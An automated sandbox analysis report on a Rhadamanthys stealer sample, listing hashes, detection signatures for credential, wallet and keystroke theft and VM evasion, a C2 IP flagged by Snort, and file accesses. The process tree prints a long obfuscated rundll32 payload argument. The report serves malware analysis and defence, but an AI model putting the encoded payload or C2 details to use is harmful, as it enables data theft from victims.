Windows Analysis Report
MqE1p1WFrf.exe

Overview

General Information

Sample Name: MqE1p1WFrf.exe
Analysis ID: 790122
MD5: dd10393642798db29a624785ead8ecec
SHA1: 39aad598cfe75a9d8770fef63b5c81db3acfa3b7
SHA256: 0130938796c7911601ade2602e770b07dad32051199372d93c7ed8bfd0e59659
Tags: 32, exe, Rhadamanthys, trojan

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries memory information (via WMI often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Allocates memory with a write watch (potentially for evading sandboxes)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Yara detected Keylogger Generic
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

  • System is w10x64
  • MqE1p1WFrf.exe (PID: 3648 cmdline: C:\Users\user\Desktop\MqE1p1WFrf.exe MD5: DD10393642798DB29A624785EAD8ECEC)
    • rundll32.exe (PID: 3352 cmdline: "C:\Users\user\AppData\Roaming\nsis_uns60877c.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8DW|AE8ANgBGOwBjrwAxAHYhAElJAEjvADAAWi0CWUiD|+wo6AQCAABI|4PEKMPMzMxM|4lEJBhIiVQkvxBIiUwkCF0BSP+LRCQwSIkEJPaBAThIbwAISMdE2yQQLQHrDoEBEEjXg8ABjwEQgQFASO05lgBzJZ8Diwwk|0gDyEiLwUiL9UyrAVR7AAPRSIt|yooJiAjrwWYFv2VIiwQlYPPwM||JSItQGEg70f90NkiDwiBIi|8CSDvCdCpmg|94SBh1GkyLQP9QZkGDOGt0B+4REUt1CBEQeBAu|3QFSIsA69VI64tI|QDBagBAU1X|VldBVEFVQVb7QVddAWaBOU1a|02L+EyL8kiL79kPhfzz8ExjSf88QYE8CVBFAO8AD4Xq8|BBi4T7CYjz8IXASI087wEPhNZqEYO8Cd2MLQEPhMfz8ESL|2cgRItfHIt3|yREi08YTAPh|0wD2UgD8TPJv0WFyQ+EpPPwTf+LxEGLEEUz0v9IA9OKAoTAdP8dQcHKDQ++wN76AAFEA9C|EXXs|0GB+qr8DXx0|w6DwQFJg8AE|0E7yXNp68aL|8EPtwxORYss|4tMA+t0WDPtvqoQdFFBixTBANP|M8mKAkyLwuu3D8HJyBEDyOUQAfdBigDVEO0zwDOf9kE7DLbgEKYAg||GAYP4CHLu6|8KSIvLQf|VSd+JBPeDxeQQxATfO28Ycq9mAUFf|0FeQV1BXF9e+11bMxdIgexgAf5kAIvp6Gb+||+|SIXAD4SYdSBM9Y2vAYsrEMgz|+j9m30gjV8ETI1F|0Yz0ovL|1Qk|WiAIEyL4A+Ea3p1IEWoEDPAi9ORIF9IiXwkIKYgcIAgP0iL8A+ES3UgpiD|UEiNVghEjUffQEiNjCSFEUiL79jofP1+II1WSGreIBDiIczz8Ohn7yA|RIsGjVcIQSCmIL1YyiGJhCSAhxLe9vPwiw7aIFiJjCTYcREHMJEg6DHvIIuc|i0yTItdOkiD+|tsSIogMEyJZCTvOEyLpBoyTIlcboQBhCTchxGGko0Ru41HSzCMJPDz8Enfi9To6fwFMIqc7ngySI2EeDJBgPN|IY1PbEQwGKQCf4PpAXXzgbx4Mv8hUmV4dU2LhLsk9CIxlCT4NQHC|0g72HI4g|psv3YzRI1JQPoAlKdBuACYAKYgQMoi+Od0GUS2MMAxSY1U+yRskSBJg+hs6N1rgjBIi86mIHhI|4X|dBKLVUJM|I4wGzFIjUwkQP8P10iBxHQhYSQtCC0B MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 6076 cmdline: C:\Windows\system32\WerFault.exe -u -p 3352 -s 648 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup
No configs have been found
Yara matches (memory dumps)
  • Source: 00000004.00000003.353314399.0000017ED8C6D000.00000004.00000020.00020000.00000000.sdmp
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  • Source: 00000004.00000003.353657620.0000017ED8E6D000.00000004.00000020.00020000.00000000.sdmp
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  • Source: 00000004.00000003.406415950.0000017ED8D42000.00000004.00000020.00020000.00000000.sdmp
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  • Source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp
    Rule: JoeSecurity_AntiVM_3
    Description: Yara detected AntiVM_3
    Author: Joe Security
  • Source: 00000001.00000003.307940010.000000000056E000.00000004.00000020.00020000.00000000.sdmp
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  (9 further entries not shown)

Yara matches (unpacked PE files)
  • Source: 4.3.rundll32.exe.17ed8d50000.9.unpack
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  • Source: 4.3.rundll32.exe.17ed8ee0000.11.unpack
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  • Source: 4.3.rundll32.exe.17ed8d50000.8.unpack
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  • Source: 4.3.rundll32.exe.17ed8e60000.14.unpack
    Rule: JoeSecurity_RHADAMANTHYS
    Description: Yara detected RHADAMANTHYS Stealer
    Author: Joe Security
  • Source: 1.3.MqE1p1WFrf.exe.2830000.2.unpack
    Rule: JoeSecurity_Keylogger_Generic
    Description: Yara detected Keylogger Generic
    Author: Joe Security
  (2 further entries not shown)
                      No Sigma rule has matched
                      Snort IDS alerts
                        • Timestamp: 01/23/23-21:39:53.428050
                          Source IP: 192.168.2.5
                          Destination IP: 179.43.163.126
                          SID: 2853002
                          Source Port: 49701
                          Destination Port: 80
                          Protocol: TCP
                          Classtype: A Network Trojan was detected
                        • Timestamp: 01/23/23-21:39:35.293558
                          Source IP: 179.43.163.126
                          Destination IP: 192.168.2.5
                          SID: 2853001
                          Source Port: 80
                          Destination Port: 49700
                          Protocol: TCP
                          Classtype: A Network Trojan was detected
                        • Timestamp: 01/23/23-21:39:35.266442
                          Source IP: 192.168.2.5
                          Destination IP: 179.43.163.126
                          SID: 2043202
                          Source Port: 49700
                          Destination Port: 80
                          Protocol: TCP
                          Classtype: A Network Trojan was detected

                      AV Detection

                      Source: MqE1p1WFrf.exe | ReversingLabs: Detection: 64%
                      Source: MqE1p1WFrf.exe | Virustotal: Detection: 68%
                      Source: C:\Users\user\AppData\Roaming\nsis_uns60877c.dll | ReversingLabs: Detection: 20%
                      Source: C:\Users\user\AppData\Roaming\nsis_uns60877c.dll | Virustotal: Detection: 23%
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DAC06C CryptUnprotectData, 4_2_00007DF471DAC06C
                      Source: MqE1p1WFrf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: Binary string: wkernel32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: MqE1p1WFrf.exe, 00000001.00000003.325515967.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.325224942.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.319728017.000000000232D000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.320216371.00000000023F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314477899.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.320396311.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314431146.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332134929.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.339607068.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.335892894.0000000002649000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdb source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316124357.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315893635.000000000232D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.310927358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.310294204.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.333746453.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: WINMMBASE.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333673223.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: kernel32.pdbUGP source: rundll32.exe, 00000004.00000003.358705595.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: MqE1p1WFrf.exe, 00000001.00000003.314533170.00000000023A7000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315108088.00000000026BC000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.326445886.00000000020C9000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.326882570.0000000002270000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.363854408.0000017ED8970000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.341772259.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: MqE1p1WFrf.exe, 00000001.00000003.320805149.0000000002640000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.322991562.00000000039C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.309501419.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308672485.0000000002322000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.308435345.0000000002321000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winmm.pdb source: MqE1p1WFrf.exe, 00000001.00000003.333316141.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: MqE1p1WFrf.exe, 00000001.00000003.332966854.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdb source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.316556327.0000000002640000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316355611.0000000002325000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbGCTL source: MqE1p1WFrf.exe, 00000001.00000003.309860796.000000000232F000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.309988464.0000000002450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.320596267.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.315606867.0000000002182000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.315705538.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.331563420.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.326182710.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: MqE1p1WFrf.exe, 00000001.00000003.320524869.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: MqE1p1WFrf.exe, 00000001.00000003.317707376.00000000028A0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.316782050.0000000002640000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: MqE1p1WFrf.exe, 00000001.00000003.329395162.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.327426446.000000000264D000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
                      Source: Binary string: profapi.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.332804586.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.378529171.0000017ED6FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wmswsock.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.349736272.0000000002184000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.341846355.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.334011206.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.333783737.000000000232C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: MqE1p1WFrf.exe, 00000001.00000003.311930369.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312105202.0000000002270000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: MqE1p1WFrf.exe, 00000001.00000003.313283405.0000000002320000.00000004.00001000.00020000.00000000.sdmp, MqE1p1WFrf.exe, 00000001.00000003.312271989.0000000002647000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ws2_32.pdbUGP source: MqE1p1WFrf.exe, 00000001.00000003.334391183.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA828C _calloc_dbg, FindFirstFileW, FindNextFileW, 4_2_00007DF471DA828C
                      Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00007DF471DA782C FindFirstFileW, FindNextFileW, FindClose, 4_2_00007DF471DA782C
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                      Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
